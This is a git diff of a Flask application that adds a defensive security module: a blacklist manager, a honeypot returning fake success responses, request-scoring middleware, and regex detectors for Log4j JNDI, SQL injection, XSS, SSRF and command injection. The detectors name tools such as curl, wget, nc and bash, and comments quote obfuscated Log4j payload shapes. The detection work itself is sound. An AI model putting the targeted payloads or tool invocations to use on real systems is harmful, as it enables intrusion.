if is_api: if is_api:
return jsonify({"error": "需要管理员权限"}), 403 return jsonify({"error": "需要管理员权限"}), 403
return redirect(url_for("pages.admin_login_page")) return redirect(url_for("pages.admin_login_page"))

View File

@@ -6,7 +6,7 @@ import json
import os import os
from typing import Optional from typing import Optional
from flask import Blueprint, current_app, redirect, render_template, session, url_for from flask import Blueprint, current_app, redirect, render_template, request, session, url_for
from flask_login import current_user, login_required from flask_login import current_user, login_required
from routes.decorators import admin_required from routes.decorators import admin_required
@@ -36,10 +36,18 @@ def render_app_spa_or_legacy(
logger.warning(f"[app_spa] manifest缺少入口文件: {manifest_path}") logger.warning(f"[app_spa] manifest缺少入口文件: {manifest_path}")
return render_template(legacy_template_name, **legacy_context) return render_template(legacy_template_name, **legacy_context)
app_spa_js_file = f"app/{js_file}"
app_spa_css_files = [f"app/{p}" for p in css_files]
app_spa_build_id = _get_asset_build_id(
os.path.join(current_app.root_path, "static"),
[app_spa_js_file, *app_spa_css_files],
)
return render_template( return render_template(
"app.html", "app.html",
app_spa_js_file=f"app/{js_file}", app_spa_js_file=app_spa_js_file,
app_spa_css_files=[f"app/{p}" for p in css_files], app_spa_css_files=app_spa_css_files,
app_spa_build_id=app_spa_build_id,
app_spa_initial_state=spa_initial_state, app_spa_initial_state=spa_initial_state,
) )
except FileNotFoundError: except FileNotFoundError:
@@ -50,6 +58,27 @@ def render_app_spa_or_legacy(
return render_template(legacy_template_name, **legacy_context) return render_template(legacy_template_name, **legacy_context)
def _get_asset_build_id(static_root: str, rel_paths: list[str]) -> Optional[str]:
mtimes = []
for rel_path in rel_paths:
if not rel_path:
continue
try:
mtimes.append(os.path.getmtime(os.path.join(static_root, rel_path)))
except OSError:
continue
if not mtimes:
return None
return str(int(max(mtimes)))
def _is_legacy_admin_user_agent(user_agent: str) -> bool:
if not user_agent:
return False
ua = user_agent.lower()
return "msie" in ua or "trident/" in ua
@pages_bp.route("/") @pages_bp.route("/")
def index(): def index():
"""主页 - 重定向到登录或应用""" """主页 - 重定向到登录或应用"""
@@ -96,6 +125,8 @@ def admin_login_page():
@admin_required @admin_required
def admin_page(): def admin_page():
"""后台管理页面""" """后台管理页面"""
if request.args.get("legacy") == "1" or _is_legacy_admin_user_agent(request.headers.get("User-Agent", "")):
return render_template("admin_legacy.html")
logger = get_logger() logger = get_logger()
manifest_path = os.path.join(current_app.root_path, "static", "admin", ".vite", "manifest.json") manifest_path = os.path.join(current_app.root_path, "static", "admin", ".vite", "manifest.json")
try: try:
@@ -110,10 +141,18 @@ def admin_page():
logger.warning(f"[admin_spa] manifest缺少入口文件: {manifest_path}") logger.warning(f"[admin_spa] manifest缺少入口文件: {manifest_path}")
return render_template("admin_legacy.html") return render_template("admin_legacy.html")
admin_spa_js_file = f"admin/{js_file}"
admin_spa_css_files = [f"admin/{p}" for p in css_files]
admin_spa_build_id = _get_asset_build_id(
os.path.join(current_app.root_path, "static"),
[admin_spa_js_file, *admin_spa_css_files],
)
return render_template( return render_template(
"admin.html", "admin.html",
admin_spa_js_file=f"admin/{js_file}", admin_spa_js_file=admin_spa_js_file,
admin_spa_css_files=[f"admin/{p}" for p in css_files], admin_spa_css_files=admin_spa_css_files,
admin_spa_build_id=admin_spa_build_id,
) )
except FileNotFoundError: except FileNotFoundError:
logger.warning(f"[admin_spa] 未找到manifest: {manifest_path},回退旧版后台模板") logger.warning(f"[admin_spa] 未找到manifest: {manifest_path},回退旧版后台模板")

22
security/__init__.py Normal file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from security.blacklist import BlacklistManager
from security.honeypot import HoneypotResponder
from security.middleware import init_security_middleware
from security.response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from security.risk_scorer import RiskScorer
from security.threat_detector import ThreatDetector, ThreatResult
__all__ = [
"BlacklistManager",
"HoneypotResponder",
"init_security_middleware",
"ResponseAction",
"ResponseHandler",
"ResponseStrategy",
"RiskScorer",
"ThreatDetector",
"ThreatResult",
]

255
security/blacklist.py Normal file
View File

@@ -0,0 +1,255 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import threading
from datetime import timedelta
from typing import List, Optional
import db_pool
from db.utils import get_cst_now, get_cst_now_str
class BlacklistManager:
"""黑名单管理器"""
def __init__(self) -> None:
self._schema_ready = False
self._schema_lock = threading.Lock()
def is_ip_banned(self, ip: str) -> bool:
"""检查IP是否被封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM ip_blacklist
WHERE ip = ?
AND is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(ip_text, now_str),
)
return cursor.fetchone() is not None
def is_user_banned(self, user_id: int) -> bool:
"""检查用户是否被封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT 1
FROM user_blacklist
WHERE user_id = ?
AND is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
LIMIT 1
""",
(user_id_int, now_str),
)
return cursor.fetchone() is not None
def ban_ip(self, ip: str, reason: str, duration_hours: int = 24, permanent: bool = False):
"""封禁IP"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(ip) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(ip_text, reason_text, now_str, expires_at),
)
conn.commit()
return True
def ban_user(self, user_id: int, reason: str):
"""封禁用户"""
return self._ban_user_internal(user_id, reason=reason, duration_hours=24, permanent=False)
def unban_ip(self, ip: str):
"""解除IP封禁"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE ip_blacklist SET is_active = 0 WHERE ip = ?", (ip_text,))
conn.commit()
return cursor.rowcount > 0
def unban_user(self, user_id: int):
"""解除用户封禁"""
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("UPDATE user_blacklist SET is_active = 0 WHERE user_id = ?", (user_id_int,))
conn.commit()
return cursor.rowcount > 0
def get_banned_ips(self) -> List[dict]:
"""获取所有被封禁的IP"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT ip, reason, is_active, added_at, expires_at
FROM ip_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def get_banned_users(self) -> List[dict]:
"""获取所有被封禁的用户"""
self._ensure_schema()
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT user_id, reason, is_active, added_at, expires_at
FROM user_blacklist
WHERE is_active = 1
AND (expires_at IS NULL OR expires_at > ?)
ORDER BY added_at DESC
""",
(now_str,),
)
return [dict(row) for row in cursor.fetchall()]
def cleanup_expired(self):
"""清理过期的封禁记录"""
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE ip_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
self._ensure_schema()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
UPDATE user_blacklist
SET is_active = 0
WHERE is_active = 1
AND expires_at IS NOT NULL
AND expires_at <= ?
""",
(now_str,),
)
conn.commit()
# ==================== Internal ====================
def _ensure_schema(self) -> None:
if self._schema_ready:
return
with self._schema_lock:
if self._schema_ready:
return
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()
self._schema_ready = True
def _ban_user_internal(
self,
user_id: int,
*,
reason: str,
duration_hours: int = 24,
permanent: bool = False,
) -> bool:
if user_id is None:
return False
self._ensure_schema()
user_id_int = int(user_id)
reason_text = str(reason or "").strip()[:512]
now_str = get_cst_now_str()
expires_at: Optional[str]
if permanent:
expires_at = None
else:
hours = max(1, int(duration_hours))
expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO user_blacklist (user_id, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
ON CONFLICT(user_id) DO UPDATE SET
reason = excluded.reason,
is_active = 1,
added_at = excluded.added_at,
expires_at = excluded.expires_at
""",
(user_id_int, reason_text, now_str, expires_at),
)
conn.commit()
return True

146
security/constants.py Normal file
View File

@@ -0,0 +1,146 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import re
# ==================== Threat Types ====================
THREAT_TYPE_JNDI_INJECTION = "jndi_injection"
THREAT_TYPE_NESTED_EXPRESSION = "nested_expression"
THREAT_TYPE_SQL_INJECTION = "sql_injection"
THREAT_TYPE_XSS = "xss"
THREAT_TYPE_PATH_TRAVERSAL = "path_traversal"
THREAT_TYPE_COMMAND_INJECTION = "command_injection"
THREAT_TYPE_SSRF = "ssrf"
THREAT_TYPE_XXE = "xxe"
THREAT_TYPE_TEMPLATE_INJECTION = "template_injection"
THREAT_TYPE_SENSITIVE_PATH_PROBE = "sensitive_path_probe"
# ==================== Scores ====================
SCORE_JNDI_DIRECT = 100
SCORE_JNDI_OBFUSCATED = 100
SCORE_NESTED_EXPRESSION = 80
SCORE_SQL_INJECTION = 90
SCORE_XSS = 70
SCORE_PATH_TRAVERSAL = 60
SCORE_COMMAND_INJECTION = 85
SCORE_SSRF = 75
SCORE_XXE = 85
SCORE_TEMPLATE_INJECTION = 70
SCORE_SENSITIVE_PATH_PROBE = 40
# ==================== JNDI (Log4j) ====================
#
# - Direct: ${jndi:ldap://...} / ${jndi:rmi://...} => 100
# - Obfuscated: ${${xxx:-j}${xxx:-n}...:ldap://...} => detect
# - Nested expression: ${${...}} => 80
JNDI_DIRECT_PATTERN = r"\$\{\s*jndi\s*:\s*(?:ldap|rmi)\s*://"
# Common Log4j "default value" obfuscation variants:
# ${${::-j}${::-n}${::-d}${::-i}:ldap://...}
# ${${foo:-j}${bar:-n}${baz:-d}${qux:-i}:rmi://...}
JNDI_OBFUSCATED_PATTERN = (
r"\$\{\s*"
r"(?:\$\{[^{}]{0,50}:-j\}|\$\{::-[jJ]\})\s*"
r"(?:\$\{[^{}]{0,50}:-n\}|\$\{::-[nN]\})\s*"
r"(?:\$\{[^{}]{0,50}:-d\}|\$\{::-[dD]\})\s*"
r"(?:\$\{[^{}]{0,50}:-i\}|\$\{::-[iI]\})\s*"
r":\s*(?:ldap|rmi)\s*://"
)
NESTED_EXPRESSION_PATTERN = r"\$\{\s*\$\{"
# ==================== SQL Injection ====================
SQLI_UNION_SELECT_PATTERN = r"\bunion\b\s+(?:all\s+)?\bselect\b"
SQLI_OR_1_EQ_1_PATTERN = r"\bor\b\s+1\s*=\s*1\b"
# ==================== XSS ====================
XSS_SCRIPT_TAG_PATTERN = r"<\s*script\b"
XSS_JS_PROTOCOL_PATTERN = r"javascript\s*:"
XSS_INLINE_EVENT_HANDLER_PATTERN = r"\bon\w+\s*="
# ==================== Path Traversal ====================
PATH_TRAVERSAL_PATTERN = r"(?:\.\./|\.\.\\)+"
# ==================== Command Injection ====================
CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN = (
r"(?:;|&&|\|\||\|)\s*"
r"(?:bash|sh|zsh|cmd|powershell|pwsh|curl|wget|nc|netcat|python|perl|ruby|php|node|cat|ls|id|whoami|uname|rm)\b"
)
CMD_INJECTION_SUBSHELL_PATTERN = r"(?:`[^`]{1,200}`|\$\([^)]{1,200}\))"
# ==================== SSRF ====================
SSRF_LOCALHOST_URL_PATTERN = r"\bhttps?\s*:\s*//\s*(?:127\.0\.0\.1\b|localhost\b|0\.0\.0\.0\b)"
SSRF_INTERNAL_IP_URL_PATTERN = r"\bhttps?\s*:\s*//\s*(?:10\.|192\.168\.|172\.(?:1[6-9]|2[0-9]|3[0-1])\.)"
SSRF_DANGEROUS_PROTOCOL_PATTERN = r"\b(?:file|gopher|dict)\s*:\s*//"
# ==================== XXE ====================
XXE_DOCTYPE_PATTERN = r"<!\s*doctype\b|\bdoctype\b"
XXE_ENTITY_PATTERN = r"<!\s*entity\b|\bentity\b"
XXE_SYSTEM_PUBLIC_PATTERN = r"\b(?:system|public)\b"
# ==================== Template Injection ====================
TEMPLATE_JINJA_EXPR_PATTERN = r"\{\{\s*[^}]{0,200}\s*\}\}"
TEMPLATE_JINJA_STMT_PATTERN = r"\{%\s*[^%]{0,200}\s*%\}"
TEMPLATE_VELOCITY_DIRECTIVE_PATTERN = r"#\s*(?:set|if)\b"
# ==================== Sensitive Path Probing ====================
SENSITIVE_PATH_DOTFILES_PATTERN = r"/\.(?:git|svn|env)(?:/|\b|$)"
SENSITIVE_PATH_PROBE_PATTERN = r"/(?:actuator|phpinfo|wp-admin)(?:/|\b|$)"
# ==================== Compiled Regex ====================
_FLAGS = re.IGNORECASE | re.MULTILINE
JNDI_DIRECT_RE = re.compile(JNDI_DIRECT_PATTERN, _FLAGS)
JNDI_OBFUSCATED_RE = re.compile(JNDI_OBFUSCATED_PATTERN, _FLAGS)
NESTED_EXPRESSION_RE = re.compile(NESTED_EXPRESSION_PATTERN, _FLAGS)
SQLI_UNION_SELECT_RE = re.compile(SQLI_UNION_SELECT_PATTERN, _FLAGS)
SQLI_OR_1_EQ_1_RE = re.compile(SQLI_OR_1_EQ_1_PATTERN, _FLAGS)
XSS_SCRIPT_TAG_RE = re.compile(XSS_SCRIPT_TAG_PATTERN, _FLAGS)
XSS_JS_PROTOCOL_RE = re.compile(XSS_JS_PROTOCOL_PATTERN, _FLAGS)
XSS_INLINE_EVENT_HANDLER_RE = re.compile(XSS_INLINE_EVENT_HANDLER_PATTERN, _FLAGS)
PATH_TRAVERSAL_RE = re.compile(PATH_TRAVERSAL_PATTERN, _FLAGS)
CMD_INJECTION_OPERATOR_WITH_CMD_RE = re.compile(CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN, _FLAGS)
CMD_INJECTION_SUBSHELL_RE = re.compile(CMD_INJECTION_SUBSHELL_PATTERN, _FLAGS)
SSRF_LOCALHOST_URL_RE = re.compile(SSRF_LOCALHOST_URL_PATTERN, _FLAGS)
SSRF_INTERNAL_IP_URL_RE = re.compile(SSRF_INTERNAL_IP_URL_PATTERN, _FLAGS)
SSRF_DANGEROUS_PROTOCOL_RE = re.compile(SSRF_DANGEROUS_PROTOCOL_PATTERN, _FLAGS)
XXE_DOCTYPE_RE = re.compile(XXE_DOCTYPE_PATTERN, _FLAGS)
XXE_ENTITY_RE = re.compile(XXE_ENTITY_PATTERN, _FLAGS)
XXE_SYSTEM_PUBLIC_RE = re.compile(XXE_SYSTEM_PUBLIC_PATTERN, _FLAGS)
TEMPLATE_JINJA_EXPR_RE = re.compile(TEMPLATE_JINJA_EXPR_PATTERN, _FLAGS)
TEMPLATE_JINJA_STMT_RE = re.compile(TEMPLATE_JINJA_STMT_PATTERN, _FLAGS)
TEMPLATE_VELOCITY_DIRECTIVE_RE = re.compile(TEMPLATE_VELOCITY_DIRECTIVE_PATTERN, _FLAGS)
SENSITIVE_PATH_DOTFILES_RE = re.compile(SENSITIVE_PATH_DOTFILES_PATTERN, _FLAGS)
SENSITIVE_PATH_PROBE_RE = re.compile(SENSITIVE_PATH_PROBE_PATTERN, _FLAGS)

126
security/honeypot.py Normal file
View File

@@ -0,0 +1,126 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import uuid
from typing import Any, Optional
from app_logger import get_logger
class HoneypotResponder:
"""蜜罐响应生成器 - 返回假成功响应,欺骗攻击者"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def generate_fake_response(self, endpoint: str, original_data: dict = None) -> dict:
"""
根据端点生成假的成功响应
策略:
- 邮件发送类: {"success": True, "message": "邮件已发送"}
- 注册类: {"success": True, "user_id": fake_uuid}
- 登录类: {"success": True} 但不设置session
- 通用: {"success": True, "message": "操作成功"}
"""
endpoint_text = str(endpoint or "").strip()
endpoint_lc = endpoint_text.lower()
category = self._classify_endpoint(endpoint_lc)
response: dict[str, Any] = {"success": True}
if category == "email":
response["message"] = "邮件已发送"
elif category == "register":
response["user_id"] = str(uuid.uuid4())
elif category == "login":
# 登录类:保持正常成功响应,但不进行任何 session / token 设置(调用方负责不写 session
pass
else:
response["message"] = "操作成功"
response = self._merge_safe_fields(response, original_data)
self._logger.warning(
"蜜罐响应已生成: endpoint=%s, category=%s, keys=%s",
endpoint_text[:256],
category,
sorted(response.keys()),
)
return response
def should_use_honeypot(self, risk_score: int) -> bool:
"""风险分>=80使用蜜罐响应"""
score = self._normalize_risk_score(risk_score)
use = score >= 80
self._logger.debug("蜜罐判定: risk_score=%s => %s", score, use)
return use
def delay_response(self, risk_score: int) -> float:
"""
根据风险分计算延迟时间
0-20: 0秒
21-50: 随机0.5-1秒
51-80: 随机1-3秒
81-100: 随机3-8秒蜜罐模式额外延迟消耗攻击者时间
"""
score = self._normalize_risk_score(risk_score)
delay = 0.0
if score <= 20:
delay = 0.0
elif score <= 50:
delay = float(self._rng.uniform(0.5, 1.0))
elif score <= 80:
delay = float(self._rng.uniform(1.0, 3.0))
else:
delay = float(self._rng.uniform(3.0, 8.0))
self._logger.debug("蜜罐延迟计算: risk_score=%s => delay_seconds=%.3f", score, delay)
return delay
# ==================== Internal ====================
def _normalize_risk_score(self, risk_score: Any) -> int:
try:
score = int(risk_score)
except Exception:
score = 0
return max(0, min(100, score))
def _classify_endpoint(self, endpoint_lc: str) -> str:
if not endpoint_lc:
return "generic"
# 先匹配更具体的:注册 / 登录
if any(k in endpoint_lc for k in ["/register", "register", "signup", "sign-up"]):
return "register"
if any(k in endpoint_lc for k in ["/login", "login", "signin", "sign-in"]):
return "login"
# 邮件相关:发送验证码 / 重置密码 / 重发验证等
if any(k in endpoint_lc for k in ["email", "mail", "forgot-password", "reset-password", "resend-verify"]):
return "email"
return "generic"
def _merge_safe_fields(self, base: dict, original_data: Optional[dict]) -> dict:
if not isinstance(original_data, dict) or not original_data:
return base
# 避免把攻击者输入或真实业务结果回显得太明显;仅合并少量“形状字段”
safe_bool_keys = {"need_verify", "need_captcha"}
merged = dict(base)
for key in safe_bool_keys:
if key in original_data and key not in merged:
try:
merged[key] = bool(original_data.get(key))
except Exception:
continue
return merged

307
security/middleware.py Normal file
View File

@@ -0,0 +1,307 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import logging
from typing import Optional
from flask import g, jsonify, request
from flask_login import current_user
from app_logger import get_logger
from app_security import get_rate_limit_ip
from .blacklist import BlacklistManager
from .honeypot import HoneypotResponder
from .response_handler import ResponseAction, ResponseHandler, ResponseStrategy
from .risk_scorer import RiskScorer
from .threat_detector import ThreatDetector, ThreatResult
# 全局实例(保持单例,避免重复初始化开销)
detector = ThreatDetector()
blacklist = BlacklistManager()
scorer = RiskScorer(blacklist_manager=blacklist)
handler: Optional[ResponseHandler] = None
honeypot: Optional[HoneypotResponder] = None
def _get_handler() -> ResponseHandler:
global handler
if handler is None:
handler = ResponseHandler()
return handler
def _get_honeypot() -> HoneypotResponder:
global honeypot
if honeypot is None:
honeypot = HoneypotResponder()
return honeypot
def _get_security_log_level(app) -> int:
level_name = str(getattr(app, "config", {}).get("SECURITY_LOG_LEVEL", "INFO") or "INFO").upper()
return int(getattr(logging, level_name, logging.INFO))
def _log(app, level: int, message: str, *args, exc_info: bool = False) -> None:
"""按 SECURITY_LOG_LEVEL 控制安全日志输出,避免过多日志影响性能。"""
try:
logger = get_logger("app")
min_level = _get_security_log_level(app)
if int(level) >= int(min_level):
logger.log(int(level), message, *args, exc_info=exc_info)
except Exception:
# 安全模块日志故障不得影响正常请求
return
def _is_static_request(app) -> bool:
"""对静态文件请求跳过安全检查以提升性能。"""
try:
path = str(getattr(request, "path", "") or "")
except Exception:
path = ""
if path.startswith("/static/"):
return True
try:
static_url_path = getattr(app, "static_url_path", None) or "/static"
if static_url_path and path.startswith(str(static_url_path).rstrip("/") + "/"):
return True
except Exception:
pass
try:
endpoint = getattr(request, "endpoint", None)
if endpoint in {"static", "serve_static"}:
return True
except Exception:
pass
return False
def _safe_get_user_id() -> Optional[int]:
try:
if hasattr(current_user, "is_authenticated") and current_user.is_authenticated:
return getattr(current_user, "id", None)
except Exception:
return None
return None
def _scan_request_threats(req) -> list[ThreatResult]:
"""仅扫描 GET query 与 POST JSON body降低开销与误报"""
threats: list[ThreatResult] = []
try:
# 1) Query 参数(所有方法均可能携带 query string
try:
args = getattr(req, "args", None)
if args:
# MultiDict -> dict(list) 以保留多值
args_dict = args.to_dict(flat=False) if hasattr(args, "to_dict") else dict(args)
threats.extend(detector.scan_input(args_dict, "args"))
except Exception:
pass
# 2) JSON body主要针对 POST其他方法保持兼容
try:
method = str(getattr(req, "method", "") or "").upper()
except Exception:
method = ""
if method in {"POST", "PUT", "PATCH", "DELETE"}:
try:
data = req.get_json(silent=True) if hasattr(req, "get_json") else None
except Exception:
data = None
if data is not None:
threats.extend(detector.scan_input(data, "json"))
except Exception:
# 扫描失败不应阻断业务
return []
threats.sort(key=lambda t: int(getattr(t, "score", 0) or 0), reverse=True)
return threats
def init_security_middleware(app):
"""初始化安全中间件到 Flask 应用。"""
try:
scorer.auto_ban_enabled = bool(app.config.get("AUTO_BAN_ENABLED", True))
except Exception:
pass
@app.before_request
def security_check():
if not bool(app.config.get("SECURITY_ENABLED", True)):
return None
if _is_static_request(app):
return None
try:
ip = get_rate_limit_ip()
except Exception:
ip = getattr(request, "remote_addr", "") or ""
user_id = _safe_get_user_id()
# 默认值,确保后续逻辑可用
g.risk_score = 0
g.response_strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.honeypot_mode = False
g.honeypot_endpoint = None
g.honeypot_generated = False
try:
# 1) 检查黑名单(静默拒绝,返回通用错误)
try:
if blacklist.is_ip_banned(ip):
_log(app, logging.WARNING, "安全拦截: IP封禁命中 ip=%s path=%s", ip, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(ip) ip=%s", ip, exc_info=True)
try:
if user_id is not None and blacklist.is_user_banned(user_id):
_log(app, logging.WARNING, "安全拦截: 用户封禁命中 user_id=%s path=%s", user_id, request.path[:256])
return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503
except Exception:
_log(app, logging.ERROR, "黑名单检查失败(user) user_id=%s", user_id, exc_info=True)
# 2) 扫描威胁GET query / POST JSON
threats = _scan_request_threats(request)
if threats:
max_threat = threats[0]
_log(
app,
logging.WARNING,
"威胁检测: ip=%s user_id=%s type=%s score=%s field=%s rule=%s",
ip,
user_id,
getattr(max_threat, "threat_type", "unknown"),
getattr(max_threat, "score", 0),
getattr(max_threat, "field_name", ""),
getattr(max_threat, "rule", ""),
)
# 记录威胁事件(异常不应阻断业务)
try:
payload = getattr(max_threat, "value_preview", "") or getattr(max_threat, "matched", "") or ""
scorer.record_threat(
ip=ip,
user_id=user_id,
threat_type=getattr(max_threat, "threat_type", "unknown"),
score=int(getattr(max_threat, "score", 0) or 0),
request_path=getattr(request, "path", None),
payload=str(payload)[:500] if payload else None,
)
except Exception:
_log(app, logging.ERROR, "威胁事件记录失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
# 高危威胁启用蜜罐模式
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if int(getattr(max_threat, "score", 0) or 0) >= 80:
g.honeypot_mode = True
g.honeypot_endpoint = getattr(request, "endpoint", None)
except Exception:
pass
# 3) 综合风险分与响应策略
try:
risk_score = scorer.get_combined_score(ip, user_id)
except Exception:
_log(app, logging.ERROR, "风险分计算失败 ip=%s user_id=%s", ip, user_id, exc_info=True)
risk_score = 0
try:
strategy = _get_handler().get_strategy(risk_score)
except Exception:
_log(app, logging.ERROR, "响应策略计算失败 risk_score=%s", risk_score, exc_info=True)
strategy = ResponseStrategy(action=ResponseAction.ALLOW)
g.risk_score = int(risk_score or 0)
g.response_strategy = strategy
# 风险分触发蜜罐模式(兼容 ResponseHandler 的 HONEYPOT 策略)
if bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
if getattr(strategy, "action", None) == ResponseAction.HONEYPOT:
g.honeypot_mode = True
except Exception:
pass
# 4) 应用延迟
try:
if float(getattr(strategy, "delay_seconds", 0) or 0) > 0:
_get_handler().apply_delay(strategy)
except Exception:
_log(app, logging.ERROR, "延迟应用失败", exc_info=True)
# 优先短路:避免业务 side effects例如发送邮件/修改状态)
if getattr(g, "honeypot_mode", False) and bool(app.config.get("HONEYPOT_ENABLED", True)):
try:
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
g.honeypot_generated = True
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "蜜罐响应生成失败", exc_info=True)
return None
except Exception:
# 全局兜底:安全模块任何异常都不能阻断正常请求
_log(app, logging.ERROR, "安全中间件发生异常", exc_info=True)
return None
return None # 继续正常处理
@app.after_request
def security_response(response):
"""请求后处理 - 兜底应用蜜罐响应。"""
if not bool(app.config.get("SECURITY_ENABLED", True)):
return response
if not bool(app.config.get("HONEYPOT_ENABLED", True)):
return response
try:
if _is_static_request(app):
return response
except Exception:
pass
# 如果在 before_request 已经生成过蜜罐响应,则不再覆盖,避免丢失其他 after_request 的改动
try:
if getattr(g, "honeypot_generated", False):
return response
except Exception:
pass
try:
if getattr(g, "honeypot_mode", False):
fake_payload = None
try:
fake_payload = request.get_json(silent=True)
except Exception:
fake_payload = None
fake_response = _get_honeypot().generate_fake_response(
getattr(g, "honeypot_endpoint", "default"),
fake_payload if isinstance(fake_payload, dict) else None,
)
return jsonify(fake_response), 200
except Exception:
_log(app, logging.ERROR, "请求后蜜罐覆盖失败", exc_info=True)
return response
return response

View File

@@ -0,0 +1,131 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
import random
import time
from dataclasses import dataclass
from enum import Enum
from typing import Any, Optional
from app_logger import get_logger
class ResponseAction(Enum):
ALLOW = "allow" # 正常放行
ENHANCE_CAPTCHA = "enhance_captcha" # 增强验证码
DELAY = "delay" # 静默延迟
HONEYPOT = "honeypot" # 蜜罐响应
BLOCK = "block" # 直接拒绝
@dataclass
class ResponseStrategy:
action: ResponseAction
delay_seconds: float = 0
captcha_level: int = 1 # 1=普通4位, 2=6位, 3=滑块
message: str | None = None
class ResponseHandler:
"""响应策略处理器"""
def __init__(self, *, rng: Optional[random.Random] = None) -> None:
self._rng = rng or random.SystemRandom()
self._logger = get_logger("app")
def get_strategy(self, risk_score: int, is_banned: bool = False) -> ResponseStrategy:
"""
根据风险分获取响应策略
0-20分: ALLOW, 无延迟, 普通验证码
21-40分: ALLOW, 无延迟, 6位验证码
41-60分: DELAY, 1-2秒延迟
61-80分: DELAY, 2-5秒延迟
81-100分: HONEYPOT, 3-8秒延迟
已封禁: BLOCK
"""
score = self._normalize_risk_score(risk_score)
if is_banned:
strategy = ResponseStrategy(action=ResponseAction.BLOCK, message="访问被拒绝")
self._logger.warning("响应策略: BLOCK (banned=%s, risk_score=%s)", is_banned, score)
return strategy
if score <= 20:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=1)
elif score <= 40:
strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=2)
elif score <= 60:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(1.0, 2.0)))
elif score <= 80:
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(2.0, 5.0)))
else:
strategy = ResponseStrategy(action=ResponseAction.HONEYPOT, delay_seconds=float(self._rng.uniform(3.0, 8.0)))
strategy.captcha_level = self._normalize_captcha_level(strategy.captcha_level)
self._logger.info(
"响应策略: action=%s risk_score=%s delay=%.3f captcha_level=%s",
strategy.action.value,
score,
float(strategy.delay_seconds or 0),
int(strategy.captcha_level),
)
return strategy
def apply_delay(self, strategy: ResponseStrategy):
"""应用延迟使用time.sleep"""
if strategy is None:
return
delay = 0.0
try:
delay = float(getattr(strategy, "delay_seconds", 0) or 0)
except Exception:
delay = 0.0
if delay <= 0:
return
